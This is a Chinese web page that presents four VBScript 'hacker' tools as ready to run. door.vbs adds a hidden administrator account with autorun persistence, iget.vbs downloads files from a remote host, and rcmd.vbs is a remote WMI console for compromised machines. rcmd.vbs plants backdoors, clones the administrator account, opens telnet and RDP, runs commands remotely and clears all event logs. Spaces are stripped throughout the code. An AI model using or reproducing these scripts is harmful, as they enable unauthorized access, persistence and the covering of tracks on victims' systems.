黑客必须要知道的几个vbs文件代码
黑客必须要知道的几个vbs文件代码
发布时间:2016-12-28 来源:查字典编辑
摘要:1.door.vbs'***************'door.vbsby黑嘿黑'***************dimwsh,FA,FSOs...

1.door.vbs

'***************

'door.vbsby黑嘿黑

'***************

dimwsh,FA,FSO

setfso=CreateObject("Scripting.FileSystemObject")

SetFA=FSO.GetFile(WScript.scriptFullName)

FA.Attributes=34

setwsh=CreateObject("WScript.Shell")

wsh.run"netuserIUSE_SERVERxyhack.91i.net/add",0,true

wsh.run"netlocalgroupadministratorsIUSE_SERVER/add",0,true

wsh.Regwrite"HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32",""&FA&""

wsh.Regwrite

"HKLMSoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALLCheckedValue",0,"REG_DWORD"

wsh.regwrite"HKEY_LOCAL_MACHINESoftwareMicrosoftCommandProcessorAutoRun",""&FA&""

wsh.regwrite"HKEY_CURRENT_USERSoftwareMicrosoftCommandProcessorAutoRun",""&FA&""

功能:添加不死帐号(随cmd启动而启动),在win下彻底隐藏。

使用:直接运行。

2.ntlm.vbs

'***************

'ntlm.vbsby黑嘿黑

'***************

dimwsh

setwsh=CreateObject("WScript.Shell")

wsh.regwrite"HKLMSoftwareMicrosoftTelnetServer1.0NTLM",WScript.Arguments(0),"REG_DWORD"

wsh.regwrite"HKLMSoftwareMicrosoftTelnetServer1.0TelnetPort",WScript.Arguments(1),"REG_DWORD"

功能:自定义telnet的ntml和端口。

使用:D:>ntml.vbs1999

3.iget.vbs

'***************************

'iget.vbsModby黑嘿黑

'***************************

SetxPost=CreateObject("Microsoft.XMLHTTP")

xPost.Open"GET",LCase(WScript.Arguments(0)),0

xPost.Send()

SetsGet=CreateObject("ADODB.Stream")

sGet.Mode=3

sGet.Type=1

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFileLCase(WScript.Arguments(1)),2

功能:命令行下下载http文件。

使用:D:>iget.vbshttp://xyhack.91i.net/vbs.rarvbs.rar

4.rcmd.vbs

'***************

'rcmd.vbsby黑嘿黑

'***************

onerrorresumenext

setoutstreem=wscript.stdout

setinstreem=wscript.stdin

if(lcase(right(wscript.fullname,11))="wscript.exe")then

setobjShell=wscript.createObject("wscript.shell")

objShell.Run("cmd.exe/kcscript//nologo"&chr(34)&wscript.scriptfullname&chr(34))

endif

ifwscript.arguments.count<3then

usage()

wscript.echo"Notenoughparameters."

wscript.quit

endif

ipaddress=wscript.arguments(0)

username=wscript.arguments(1)

password=wscript.arguments(2)

usage()

outstreem.write"Conneting"&ipaddress&"...."

setobjlocator=createobject("wbemscripting.swbemlocator")'20

setobjswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)

objswbemservices.security_.privileges.add23,true

objswbemservices.security_.privileges.add18,true

objswbemservices.security_.privileges.add7,true

objswbemservices.security_.privileges.add11,true

iferrornumber<>0then

wscript.echo"Error!"

callmain()

else

wscript.echo"OK!"

endif

callmain()

'***********************************************************

functiondoor()

outstreem.write"Creatingtheblankdoor.."

setobjinstproc=objswbemservices.get("win32_process")

cmddoor="cmd/cechodimwsh,FA,FSO,t>%windir%system32svrer.vbs"_

&"&&echosetfso=CreateObject(""Scripting.FileSystemObject"")>>%windir%system32svrer.vbs"_

&"&&echoSetFA=FSO.GetFile(WScript.scriptFullName)>>%windir%system32svrer.vbs"_

&"&&echoFA.Attributes=34>>%windir%system32svrer.vbs"_

&"&&echosett=fso.CreateTextFile(""%windir%system32SYSTEM.bat"",true)>>%windir%system32svrer.vbs"_

&"&&echot.WriteLine(""netuserIUSE_SERVERxyhack.91i.net/add"")>>%windir%system32svrer.vbs"_

&"&&echot.WriteLine(""netlocalgroupadministratorsIUSE_SERVER/add"")>>%windir%system32svrer.vbs"_

&"&&echot.WriteLine(""Attrib+h%windir%system32SYSTEM.bat"")>>%windir%system32svrer.vbs"_

&"&&echot.Close>>%windir%system32svrer.vbs"_

&"&&echosetwsh=CreateObject(""WScript.Shell"")>>%windir%system32svrer.vbs"_

&"&&echowsh.run""netuserIUSE_SERVERxyhack.91i.net/add"",0,true>>%windir%system32svrer.vbs"_

&"&&echowsh.run""netlocalgroupadministratorsIUSE_SERVER/add"",0,true>>%windir%system32svrer.vbs"_

&"&&echowsh.Regwrite

""HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32"",""%windir%system32svrer.vbs"">>%windir%system32svrer.vbs"_

&"&&echowsh.Regwrite

""HKLMSoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALLCheckedValue"",0,""REG_DWORD"">>%win

dir%system32svrer.vbs"_

&"&&echowsh.regwrite""HKEY_LOCAL_MACHINESoftwareMicrosoftCommand

ProcessorAutoRun"",""%windir%system32svrer.vbs"">>%windir%system32svrer.vbs"_

&"&&echowsh.regwrite""HKEY_CURRENT_USERSoftwareMicrosoftCommand

ProcessorAutoRun"",""%windir%system32svrer.vbs"">>%windir%system32svrer.vbs"_

&"&&echowsh.run""cmd/cat20:00,20:10,20:20,20:30%windir%system32SYSTEM.bat"",0,true

>>%windir%system32svrer.vbs"

objinstproc.create(cmddoor)

showerror(err.number)

Wscript.Sleep(1500)

outstreem.write"Runingtheblankdoor.."

objinstproc.create("cmd/ccscript%windir%system32svrer.vbs")

showerror(err.number)

callmain()

endfunction

'***********************************************************

functionca()

Wscript.Echo"enterthecausername:"

causername=WScript.StdIn.Readline()

Wscript.Echo"enterthecapassword:"

capassword=WScript.StdIn.Readline()

outstreem.write"GettingSIDof"&causername&"...."

setcolinstsid=objswbemservices.execquery("select*fromwin32_useraccountwherename="&chr(34)&causername&chr(34))

foreachobjinstsidincolinstsid

strsid=objinstsid.sid

sidflag=right(strsid,len(strsid)-instrrev(strsid,"-"))

strflag=cstr(hex(sidflag))

regname=string(8-len(strflag),"0")&strflag

next

ifstrsid=""then

wscript.echo"Error."&vbcrlf&"Usernameisnotexist."

callmain()

else

wscript.echo"OK!"

endif

outstreem.write"Prepairing.."

setobjinstproc=objswbemservices.get("win32_process")

showerroronly(err.number)

cmdline="cmd/cechosetoreg=getobject(""winmgmts:rootdefault:stdregprov"")>%temp%ca.vbs"_

&"&&echooreg.getbinaryvalue^&h80000002,""SAMSAMDomainsAccountUsers00001F4"",""F"",uvalue>>%temp%ca.vbs"_

&"&&echooreg.setbinaryvalue^&h80000002,""SAMSAMDomainsAccountUsers"?name&""",""F"",uvalue>>%temp%ca.vbs"_

&"&&echosetsh=createobject(""wscript.shell"")>>%temp%ca.vbs"_

&"&&echosh.regwrite""HKLMSOFTWAREMicrosoftWindowsScriptHostSettingscaflag"",""1"">>%temp%ca.vbs"

objinstproc.create(cmdline)

showerroronly(err.number)

cmdline="cmd/cechoatime=time>%temp%getsys.vbs"_

&"&&echosetsh=createobject(""wscript.shell"")>>%temp%getsys.vbs"_

&"&&echosh.run""cmd/cat23:59cscript%temp%ca.vbs"",0,true>>%temp%getsys.vbs"_

&"&&echosh.run""cmd/ctime23:58:59.90"",0,true>>%temp%getsys.vbs"_

&"&&echowscript.sleep(1100)>>%temp%getsys.vbs"_

&"&&echosh.run""cmd/ctime""^&atime,0,true>>%temp%getsys.vbs"

objinstproc.create(cmdline)

showerror(err.number)

outstreem.write"Processing."

setcolinstsvr=objswbemservices.execquery("select*fromwin32_servicewherename='schedule'")

showerroronly(err.number)

foreachobjinstsvrincolinstsvr

flag1=0

flag2=0

ifobjinstsvr.startmode="Disabled"then

objinstsvr.changestartmode("Manual")

flag1=1

endif

ifobjinstsvr.started=flasethen

errnumber=objinstsvr.startservice()

flag2=1

endif

showerroronly(err.number)

objinstproc.create("cmd/ccscript%temp%getsys.vbs")

showerroronly(err.number)

setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")

fori=1to20

objinstreg.getstringvalue&h80000002,"SOFTWAREMicrosoftWindowsScriptHostSettings","caflag",svalue

ifsvalue="1"then

exitfor

else

wscript.sleep(500)

endif

next

objinstproc.create("netuser"&causername&""&capassword)

ifflag1thenobjinstsvr.changestartmode("Disabled")

ifflag2thenobjinstsvr.stopservice()

next

ifsvalue<>"1"then

wscript.echo"Error."&vbcrlf&"Waitingtimeout."

else

showerror(err.number)

endif

outstreem.write"CleanUp.."

objinstproc.create("cmd/cdel%temp%ca.vbs")

showerroronly(err.number)

objinstproc.create("cmd/cdel%temp%getsys.vbs")

showerroronly(err.number)

ifsvalue="1"thenobjinstreg.deletevalue&h80000002,"SOFTWAREMicrosoftWindowsScriptHostSettings","caflag"

showerror(err.number)

callmain()

endfunction

functionshowerroronly(errornumber)

iferrornumberThen

wscript.echo"Error0x"&cstr(hex(err.number))&"."

iferr.description<>""then

wscript.echo"Errordescription:"&err.description&"."

endif

callmain()

else

outstreem.write"."

endif

endfunction

'***********************************************************

functionshare()

Wscript.Echostring(18,"-")

Wscript.Echo"0.返回CMD>="

wscript.echo"1.列出共享信息:="

Wscript.Echo"2.创建共享="

Wscript.Echo"3.删除共享="

Wscript.Echostring(18,"-")

Wscript.Echo"pleasechosetheparameter:"

parameters=WScript.StdIn.Readline()

SelectCaseparameters

case"quit","0"

main()

case"list","1"

listshare()

case"open","2"'40

openshare()

case"close","3"

closeshare()

endSelect

endfunction

functionlistshare()

outstreem.write"ListingtheNetsharefrom"&ipaddress&"...."

SetcolShares=objswbemservices.ExecQuery("Select*fromWin32_Share")

showerror(err.number)'50

wscript.echo_

("Caption"&chr(9)&chr(9)&"Name:"&chr(9)&chr(9)&"Path")

ForeachobjShareincolShares

wscript.echo_

(objShare.Caption&chr(9)&objShare.Name&chr(9)&chr(9)&objShare.Path)

Next

wscript.echovbcrlf&"AllSharehavebeenlistedSuccessfully!"

callshare()

endfunction

functionopenshare()

wscript.echo"Enterthepath:"'70

path=WScript.StdIn.Readline()

wscript.echo"Enterthename:"

sname=WScript.StdIn.Readline()

ConstFILE_SHARE=0

ConstMAXIMUM_CONNECTIONS=25

SetobjNewShare=objswbemservices.Get("Win32_Share")

errReturn=objNewShare.Create_

(path,sname,FILE_SHARE,_

MAXIMUM_CONNECTIONS,"默认共享")

wscript.echo"ThenSharehavebeenCeatedSuccessfully!"

callshare()

endfunction

functioncloseshare()

wscript.echo"PleseEnterThename:"

kname=WScript.StdIn.Readline()

outstreem.write"killingthe"&kname&"...."

SetcolShares=objswbemservices.ExecQuery_

("Select*fromWin32_ShareWhereName="&"'"&kname&"'")

ForEachobjShareincolShares

objShare.Delete

Next

showerror(err.number)

callshare()

endfunction

'***********************************************************

functionlistsvr()

outstreem.write"ListingtheServicefrom"&ipaddress&"...."

SetcolListOfServices=objswbemservices.ExecQuery_

("Select*fromWin32_Service")

showerror(err.number)

wscript.echo_

("Name"&chr(9)&chr(9)&"State"&chr(9)&chr(9)&"Mode"&chr(9)&"PathName")

ForEachobjServiceincolListOfServices

iflen(objService.name)<8then

strname=objService.name&chr(9)

else

strname=objService.name

endif

wscript.echo_

(strname&chr(9)&objService.State&chr(9)&chr(9)&objService.StartMode&chr(9)&objService.PathName)

Next

wscript.echovbcrlf&"AllServiceshavebeenlistedSuccessfully!"

callmain()

endfunction

'************************************************************

functionreboot()

outstreem.write"Now,restartingtarget...."

strwqlquery="select*fromwin32_operatingsystemwhereprimary='true'"

setcolinstances=objswbemservices.execquery(strwqlquery)

foreachobjinstanceincolinstances

objinstance.win32shutdown(6)

next

showerror(err.number)

callmain()

endfunction

'*************************************************************

functioninf()

outstreem.write"GettingInfomationfrom"&ipaddress&"...."

setobj1=objget("win32_computersystem")

showerror(err.number)

wscript.echo""&vbcrlf

setobj2=objget("win32_operatingsystem")

setcol3=objswbemservices.instancesof("win32_processor")

setobj4=objget("win32_logicalmemoryconfiguration")

setobj5=objget("win32_bios")

setobj6=objget("win32_displayconfiguration")

setcol7=objswbemservices.instancesof("win32_diskdrive")

setcol8=objswbemservices.instancesof("win32_logicaldisk")

setcol9=objswbemservices.instancesof("win32_networkadapterconfiguration")

setcol10=objswbemservices.instancesof("win32_quickfixengineering")

wnl"OSInfo:"

wnl"ComputerName:"&obj1.name

wnl"UserName:"&obj1.username

wnl"Domain:"&obj1.domain

domainrole=""

selectcaseobj1.domainrole

case0

domainrole="Workstation"

case1

domainrole="MemberWorkstation"

case2

domainrole="Server"

case3

domainrole="MemberServer"

case4

domainrole="BackupDomainController"

case5

domainrole="MainDomainController"

endselect

withobj2

wnl"DomainRole:"&domainrole

wnl"Caption:"&.caption

wnl"Organization:"&.organization

wnl"RegisteredUser:"&.registereduser

wnl"InstallDate:"&timeformat(.installdate)

wnl"LastBootUpTime:"&timeformat(.lastbootuptime)

wnl"WindowsDirectory:"&.windowsdirectory

wnl"SystemDirectory:"&.systemdirectory

wnl"BootDevice:"&.bootdevice

wnl"CountryCode:"&.countrycode

wnl"CSName:"&.csname

wnl"Description:"&.description

wnl"Manufacturer:"&.manufacturer

wnl"SerialNumber:"&.serialnumber

wnl"Version:"&.version

wnl"SystemType:"&obj1.systemtype

wnl"SystemStartupDelay:"&obj1.systemstartupdelay&"s"

wnl"SystemStartupOptions:"&obj1.systemstartupoptions(0)

fori=1toubound(obj1.systemstartupoptions)

wnlspace(28)&obj1.systemstartupoptions(i)

next

endwith

wnlvbcrlf&"ProcessorInfo:"

wnl"NumberOfProcessors:"&obj1.numberofprocessors

foreachobj3incol3

withobj3

wnl"DeviceID:"&.deviceid

wnl"Name:"&.name

wnl"CurrentClockSpeed:"&.currentclockspeed&"MHz"

wnl"Description:"&.description

wnl"ExtClock:"&.extclock&"MHz"

wnl"L2CacheSize:"&.l2cachesize&"KB"

wnl"L2CacheSpeed:"&.l2cachespeed&"MHz"

wnl"ProcessorId:"&.processorid

wnl"Manufacturer:"&.manufacturer

wnl"SocketDesignation:"&.socketdesignation

wnl"AddressWidth:"&.addresswidth&"Bit"

wnl"DataWidth:"&.datawidth&"Bit"

endwith

next

withobj4

wnlvbcrlf&"MemoryInfo:"

wnl"TotalPhysicalMemory:"&cint(.totalphysicalmemory/1024)&"MB"

wnl"FreePhysicalMemory:"&cint(obj2.freephysicalmemory/1024)&"MB"

wnl"TotalPageFileSpace:"&cint(.totalpagefilespace/1024)&"MB"

wnl"TotalVirtualMemory:"&cint(.totalvirtualmemory/1024)&"MB"

wnl"AvailableVirtualMemory:"&cint(.availablevirtualmemory/1024)&"MB"

endwith

wnlvbcrlf&"BIOSInfo:"

wnl"Description:"&obj5.description

wnl"CurrentLanguage:"&obj5.currentlanguage

wnl"Version:"&obj5.version

wnl"Manufacturer:"&obj5.manufacturer

withobj6

wnlvbcrlf&"DisplayConfiguration:"

wnl"Caption:"&.caption

wnl"DeviceName:"&.devicename

wnl"DriverVersion:"&.driverversion

wnl"DisplayFrequency:"&.displayfrequency&"Hz"

wnl"BitsPerPel:"&.bitsperpel&"Bit"

wnl"Pels:"&.pelswidth&"x"&.pelsheight

endwith

wnlvbcrlf&"DiskInfo:"

foreachobj7incol7

withobj7

wnl"DeviceID:"&.deviceid

wnl"Caption:"&.caption

wnl"InterfaceType:"&.interfacetype

wnl"SCSIBus:"&.scsibus

wnl"SCSILogicalUnit:"&.scsilogicalunit

wnl"SCSIPort:"&.scsiport

wnl"SCSITargetId:"&.scsitargetid

wnl"SectorsPerTrack:"&.sectorspertrack&"KB"

wnl"Partitions:"&.partitions

wnl"Size:"&sizeformat(.size)

endwith

next

str="Volume"+space(2)+"Type"+space(8)+"Format"+space(4)

str=str+"Size"+space(6)+"Free"+space(12)+"Label"

wnlstr

foreachobj8incol8

withobj8

drivetype=""

selectcase.drivetype

case0

drivetype="Unknow"

case1

drivetype="NoRootDir"

case2

drivetype="Removable"

case3

drivetype="Fixed"

case4

drivetype="Network"

case5

drivetype="CD-ROM"

case6

drivetype="RAM"

endselect

strpercent=""

if.size<>""and.freespace<>""then

strpercent="("&formatpercent(.freespace/.size,0)&")"

endif

str=""&wsp(.caption,8)&wsp(drivetype,12)&wsp(.filesystem,10)&wsp(sizeformat(.size),10)

str=str&wsp(sizeformat(.freespace)&strpercent,16)&.volumename

wnlstr

endwith

next

wnlvbcrlf&"NICInformaton:"

foreachobj9incol9

withobj9

if.IPEnabledthen

wnl"Index:"&.index

wnl"Description:"&.description

wnl"DHCPEnabled:"&.dhcpenabled

wnl"DHCPServer:"&.dhcpserver

wnl"DNSHostName:"&.dnshostname

wnl"DNSServerSearchOrder:"&wfl(.dnsserversearchorder)

wnl"WINSPrimaryServer:"&.winsprimaryserver

wnl"IPAddress:"&wfl(.ipaddress)

wnl"MACAddress:"&.macaddress

wnl"DefaultIPGateway:"&wfl(.defaultipgateway)

wnl"IPSubnet:"&wfl(.ipsubnet)

wnl"IPFilterSecurityEnabled:"&.ipfiltersecurityenabled

wnl"IPSecPermitIPProtocols:"&wfl(.ipsecpermitipprotocols)

wnl"IPSecPermitTCPPorts:"&wfl(.ipsecpermittcpports)

wnl"IPSecPermitUDPPorts:"&wfl(.ipsecpermitudpports)

endif

endwith

next

wnlvbcrlf&"HotFixesInfo:"

foreachobj10incol10

wnl"HotFixID:"&obj10.hotfixid

wnl"FixComments:"&obj10.fixcomments

wnl"InstallDate:"&obj10.installdate

wnl"ServicePackInEffect:"&obj10.servicepackineffect

next

wnlvbcrlf&"Applications:"

setobjswb1=objlocator.connectserver(ipaddress,"root/default",username,password)

setobj11=objswb1.get("stdregprov")

HKLM=&h80000002

keypath="SOFTWAREMicrosoftWindowsCurrentVersionUninstall"

obj11.enumkeyHKLM,keypath,keyarray

redimstr(ubound(keyarray)+1)

j=0

fori=0toubound(keyarray)

obj11.getstringvalueHKLM,keypath+keyarray(i),"displayname",strvalue

ifstrvalue<>""then

str(j)=strvalue

j=j+1

endif

next

ifj>1then

fori=0toj-1

fork=0toj-i-1

ifstrcomp(str(k),str(k+1),1)=1then

strtemp=str(k+1)

str(k+1)=str(k)

str(k)=strtemp

endif

next

next

endif

fori=0toj-1

wnl""&str(i)

next

wscript.echo""&vbcrlf

wscript.echo"TheInfomationfrom&ipaddress&hadbeenlistedSuccessfully!"

callmain()

endfunction

subwnl(msg)

wscript.echomsg

ifisobject(of)then

onerrorresumenext

of.writelinemsg

showerror()

onerrorgoto0

endif

endsub

functionwfl(byrefobj)

str=""

fori=0toubound(obj)

str=str&obj(i)&""

next

wfl=str

endfunction

functionwsp(msg,num)

ifmsg<>""then

msg=left(msg,num-1)

wsp=msg&space(num-len(msg))

else

wsp=space(num)

endif

endfunction

functiontimeformat(msg)

timeformat=left(msg,4)&"/"&mid(msg,5,2)&"/"&mid(msg,7,2)&""&mid(msg,9,2)&":"&mid(msg,11,2)&":"&mid(msg,13,2)

endfunction

functionsizeformat(msg)

ifmsg<>""then

size=msg/1048576

ifsize>1024then

sizeformat=round(size/1024,2)&"GB"

else

sizeformat=round(size,1)&"MB"

endif

endif

endfunction

functionobjget(msg)

setcol=objswbemservices.instancesof(msg)

foreachobjxincol

setobj=objx

next

setobjget=obj

endfunction

'******************************************

functioncommand()

wscript.echo"PleseEnterTheCommand:"

callrun()

endfunction

functionrun()

strcmdline=WScript.StdIn.Readline()

ifstrcmdline="exit"orstrcmdline="quit"orstrcmdline="0"then

callmain()

endif

outstreem.write"Runningthecommand...."

setobjinstance=objswbemservices.get("win32_process")

setobjmethod=objinstance.methods_("create")

setobjinparam=objmethod.inparameters.spawninstance_()

objinparam.commandline=strcmdline

setobjoutparam=objinstance.execmethod_("create",objinparam)

ifobjoutparam.returnvalue<>0then

wscript.echo"Error!"

callcommand()

else

wscript.echo"OK!"

endif

wscript.echo"TheProcessIDis"&objoutparam.processid

wscript.echo"Runingcommand:"&strcmdline&".to"&ipaddress&"Successfully!"&vbcrlf

callcommand()

endfunction

'*******************************************

functionpslist()

outstreem.write"Listingprocess...."

setcolinstances=objswbemservices.execquery("select*fromwin32_process")

showerror(err.number)

wscript.echovbcrlf&"Name"&chr(9)&chr(9)&"Pid"&chr(9)&"ExecutablePath"

foreachobjinstanceincolinstances

iflen(objinstance.name)<8then

strname=objinstance.name&chr(9)

else

strname=objinstance.name

endif

wscript.echostrname&chr(9)&objinstance.handle&chr(9)&objinstance.executablepath

next

wscript.echovbcrlf&"AllprocesshavebeenlistedSuccessfully!"

callmain()

endfunction

'*****************************************

functionpskill()

wscript.echo"pleseentertheprocess'sid:"

strprocess=WScript.StdIn.Readline()

outstreem.write"Killingid="&strprocess&"process...."

setobjinstance=objswbemservices.get("win32_process.handle="&"'"&strprocess&"'")

ifvartype(objinstance)<>vbobjectthen

wscript.echovbcrlf&"Specifiedprocessisnotexist."

callmain()

else

setobjmethod=objinstance.methods_("terminate")

setobjinparam=objmethod.inparameters.spawninstance_()

objinparam.reason=0

setobjoutparam=objinstance.execmethod_("terminate",objinparam)

showerror(objoutparam.returnvalue)

wscript.echo"Theprocess'sid="&strprocess&"havebeenkilledSuccessfully!"

endif

callmain()

endfunction

'********************************************************

functiontelnet()

outstreem.write"Queryingstateoftelnetserver...."

setobjswbemservices=objlocator.connectserver(ipaddress,"rootcimv2",username,password)

setcolinstances=objswbemservices.execquery("select*fromwin32_servicewherename='tlntsvr'")

showerror(err.number)

foreachobjinstanceincolinstances

ifobjinstance.startmode="Disabled"then

outstreem.write"Telnetserverhasbeendisabled.Nowchangeingstartmodetomanual...."

setobjmethod=objinstance.methods_("changestartmode")

setobjinparam=objmethod.inparameters.spawninstance_()

objinparam.startmode="Manual"

setobjoutparam=objinstance.execmethod_("changestartmode",objinparam)

showerror(objoutparam.returnvalue)

endif

outstreem.write"Changeingstate...."

ifobjinstance.started=truethen

intstatus=objinstance.stopservice()

showerror(intstatus)

wscript.echo"TargettelnetserverhasbeenSTOPSuccessfully."

else

showerror(intstatus)

wscript.echo"pleseenterthentlm:"

ntlm=WScript.StdIn.Readline()

wscript.echo"pleseentertheport:"

port=WScript.StdIn.Readline()

ifnotisnumeric(ntlm)orntlm<0orntlm>2then

wscript.echo"ThevalueofNTMLiswrong."

callmain()

endif

ifnotisnumeric(port)then

wscript.echo"Thevalueofportiswrong."

main()

endif

setobjswbemservices1=objlocator.connectserver(ipaddress,"root/default",username,password)

outstreem.write"SettingNTLM="&ntlm&"...."

setobjinstance1=objswbemservices1.get("stdregprov")

setobjmethod=objinstance1.methods_("SetDWORDvalue")

setobjinparam=objmethod.inparameters.spawninstance_()

objinparam.hdefkey=&h80000002

objinparam.ssubkeyname="SOFTWAREMicrosoftTelnetServer1.0"

objinparam.svaluename="NTLM"

objinparam.uvalue=ntlm

setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)

showerror(objoutparam.returnvalue)

outstreem.write"Settingport="&port&"...."

objinparam.svaluename="TelnetPort"

objinparam.uvalue=port

setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)

showerror(objoutparam.returnvalue)

intstatus=objinstance.startservice()

wscript.echo"TargettelnetserverhasbeenSTARTSuccessfully!"

wscript.echo"Now,youcantry:telnet"&ipaddress&""&port&",togetashell."

endif

next

callmain()

endfunction

'********************************************************

functionrs()

outstreem.write"CheckingTheOSType...."

setcolinstoscaption=objswbemservices.execquery("selectcaptionfromwin32_operatingsystem")

foreachobjinstoscaptionincolinstoscaption

ifinstr(objinstoscaption.caption,"Server")>0then

wscript.echo"OK!"

else

wscript.echo"OK!"

wscript.echo"OSTypeis"&objinstoscaption.caption

wscript.echo"youcann'topenterminalservices,canceling...."&chr(13)'60

callmain()

endif

next

wscript.echo"pleseentertheport:"

port=WScript.StdIn.Readline()

ifnotisnumeric(port)orport<1orport>65000then'50

wscript.echo"Thenumberofportiserror."

callmain()

endif

outstreem.write"Writingintoregistry...."

setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")

HKLM=&h80000002

withobjinstreg

.createkey,"SOFTWAREMicrosoftWindowsCurrentVersionnetcache"

.setdwordvalueHKLM,"SOFTWAREMicrosoftWindowsCurrentVersionnetcache","Enabled",0'70

.createkeyHKLM,"SOFTWAREPoliciesMicrosoftWindowsInstaller"

.setdwordvalueHKLM,"SOFTWAREPoliciesMicrosoftWindowsInstaller","EnableAdminTSRemote",1

.setdwordvalueHKLM,"SYSTEMCurrentControlSetControlTerminalServer","TSEnabled",1

.setdwordvalueHKLM,"SYSTEMCurrentControlSetServicesTermDD","Start",2

.setdwordvalueHKLM,"SYSTEMCurrentControlSetServicesTermService","Start",2

.setstringvalueHKLM,".DEFAULTKeyboardLayoutToggle","Hotkey","1"

.setdwordvalueHKLM,"SYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp","PortNumber",port

endwith

showerror(err.number)

wscript.echo"Now,youneedtoreboottarget!"

wscript.echo"Doyouwanttoreboottargetnow?[y/n]"

strcancel=WScript.StdIn.Readline()

ifstrcancel="n"then

wscript.echo"youneedtoreboottargetthen!!"

callmain()

else

callreboot()

endif

wscript.echo"Youcanlogonterminalserviceson"&port&"later,Goodluck!"

callmain()

endFunction

'**************************************************************

functionclog()

outstreem.write"Clearingalllogs...."

strwqlquery="select*fromWin32_NTEventLogFile"

setcolinstances=objswbemservices.execquery(strwqlquery,"wql",&h20)

foreachobjinstanceincolinstances

ifobjinstance.cleareventlog()<>0then

wscript.echo"Error!"'100

callmain()

endif

next

wscript.echo"OK!"

wscript.echo"AlllogshavebeenclearedSuccessfully!"

callmain()

endfunction

'***************************************************************

functionshowerror(errornumber)

iferrornumberThen

wscript.echo"Error0x"&cstr(hex(err.number))&"."

iferr.description<>""then

wscript.echo"Errordescription:"&err.description&"."

endif

callmain()

else

wscript.echo"OK!"

endif

endfunction

'*****************************************************************

functionusage()

wscript.echostring(79,"*")

wscript.echo"RCMDv1.05"

wscript.echo"RemoteexecutionScript,by黑嘿黑"

wscript.echo"Welcometovisitewww.xyhack.91i.net"

wscript.echo"QQ:123230273E-mail:cnhacker521@hotmail.com"

wscript.echo"Usage:"

wscript.echo"cscript"&wscript.scriptfullname&"targetIPusernamepassword"

wscript.echo"Thenchosethecommand>"

wscript.echostring(79,"*")

endfunction

'**********************************************************

functionmain()

wscript.echo""

wscript.echo"Nowchosethecommand>"

wscript.echo"0.quit退出脚本"

wscript.echo"1.telnet远程开/关telnet"

wscript.echo"2.3389远程开3389"

wscript.echo"3.clog远程删除所有日志"

wscript.echo"4.getf获取肉鸡系统信息"

wscript.echo"5.pslist例出进程"

wscript.echo"6.pskill删除进程"

wscript.echo"7.command远程执行DOS命令"

wscript.echo"8.reboot远程重启肉鸡"

wscript.echo"9.slist例出远程肉鸡上的服务信息"

wscript.echo"A.Share1.列出共享2.创建共享3.删除共享"

wscript.echo"B.ca克隆帐号"

wscript.echo"C.Door种植后门"

wscript.echostring(79,"*")

wscript.echo"CMD>"

cmd=WScript.StdIn.Readline()

wscript.echo""

SelectCasecmd

case"telnet","1"

telnet()

case"3389","2"

rs()

case"clog","3"

clog()

case"getf","4"

inf()

case"psl","pslist","5"

pslist()

case"psk","pskill","6"

pskill()

case"cmd","command","7"

command()

case"reboot","8"

reboot()

case"slist","9"

listlistsvr()

case"share","10","a","A"

share()

case"B","b","11"

ca()

case"C","c","12"

door()

case"quit","0"

wscript.quit

endselect

endfunction

标签:

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新vbs学习
热门vbs学习
脚本专栏子分类